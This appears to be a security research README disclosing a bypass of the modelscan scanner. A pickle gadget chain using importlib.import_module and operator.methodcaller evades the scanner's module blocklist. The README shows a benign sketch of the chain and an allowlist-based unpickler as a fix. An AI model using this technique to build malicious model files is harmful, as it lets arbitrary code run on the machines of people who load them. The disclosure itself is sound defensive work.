
Security Research PoC: modelscan bypass

This repository contains a proof-of-concept model file demonstrating a bypass of ProtectAI's modelscan scanner.

DO NOT load untrusted model files. This file executes arbitrary code on load.

Vulnerability

The pickle payload uses importlib.import_module combined with operator.methodcaller to achieve code execution. Neither module is in modelscan's unsafe_globals blocklist.
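A minimal, deliberately benign sketch of the gadget chain (not the repository's actual payload): one object's __reduce__ imports a module via importlib.import_module, and a second object's __reduce__ invokes a method on it via operator.methodcaller. Here the import target is math and the call is sqrt, standing in for the dangerous equivalents; the class names are illustrative.

```python
import importlib
import operator
import pickle

class _Import:
    """On unpickling, evaluates importlib.import_module("math")."""
    def __reduce__(self):
        return importlib.import_module, ("math",)

class Payload:
    """On unpickling, calls .sqrt(16.0) on whatever _Import produced."""
    def __reduce__(self):
        return operator.methodcaller("sqrt", 16.0), (_Import(),)

data = pickle.dumps(Payload())
# The serialized stream references only importlib.import_module and
# operator.methodcaller as globals, so a blocklist keyed on modules
# like os or subprocess has nothing to match.
result = pickle.loads(data)
print(result)
```

Swapping "math"/"sqrt" for an attacker-chosen module and method gives arbitrary code execution on load, which is exactly what the warning above refers to.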

Impact

Any pickle-based model file (.pkl, .bin, .pt, .pth, .ckpt) can bypass modelscan and execute arbitrary code. The fundamental issue is that blocking individual modules (os, subprocess, etc.) is insufficient when importlib.import_module can dynamically import any module at runtime.
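To illustrate why an allowlist (rather than a blocklist) closes this class of hole, here is a sketch of the "restricting globals" pattern from the CPython pickle documentation: an Unpickler subclass whose find_class resolves only explicitly approved (module, name) pairs, so importlib and operator are rejected by default rather than needing to be enumerated. The ALLOWED set shown is a placeholder.

```python
import io
import operator
import pickle

class AllowlistUnpickler(pickle.Unpickler):
    # Only these (module, name) pairs may be resolved during unpickling.
    # Anything else, including importlib.import_module and
    # operator.methodcaller, is refused without being listed by name.
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

# A pickle containing only builtin containers needs no globals and loads fine.
safe = pickle.dumps({"weights": [1, 2, 3]})
print(AllowlistUnpickler(io.BytesIO(safe)).load())

# A stream referencing a global outside the allowlist is rejected.
bad = pickle.dumps(operator.methodcaller("upper"))
try:
    AllowlistUnpickler(io.BytesIO(bad)).load()
except pickle.UnpicklingError as exc:
    print(exc)
```

A scanner built on the same principle would flag any global reference outside a known-safe set instead of pattern-matching known-bad modules.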

Tested Against

modelscan 0.7.6 (the latest release on PyPI at the time of testing)
